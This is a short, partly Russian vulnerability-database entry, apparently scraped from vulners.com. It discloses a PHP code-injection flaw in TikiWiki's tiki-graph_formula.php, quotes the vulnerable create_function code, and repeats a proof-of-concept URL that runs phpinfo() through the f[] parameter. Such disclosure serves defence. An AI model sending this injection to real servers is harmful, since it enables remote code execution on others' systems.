TikiWiki php injection

2007-10-1000:00:00

vulners.com

3476

JSON

оф сайт http://tikiwiki.org/
уязвимость носит критический характер.

файл tiki-graph_formula.php содержит код:
foreach( array_values( $_GET['f'] ) as $key=>$formula )
{
$formula = convert_formula( $formula );
…
function convert_formula( $formula )
{
…
return create_function('$x', "return $formula;");
}

Poc:
http://localhost/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

The Best forum on Web Security Application http://forum.antichat.ru/

JSON

TikiWiki php injection

Poc: http://localhost/tikiwiki/tiki-graph_formula.php?w=1&amp;h=1&amp;s=1&amp;min=1&amp;max=2&amp;f[]=x.tan.phpinfo&#40;&#41;&amp;t=png&amp;title=

Poc:
http://localhost/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=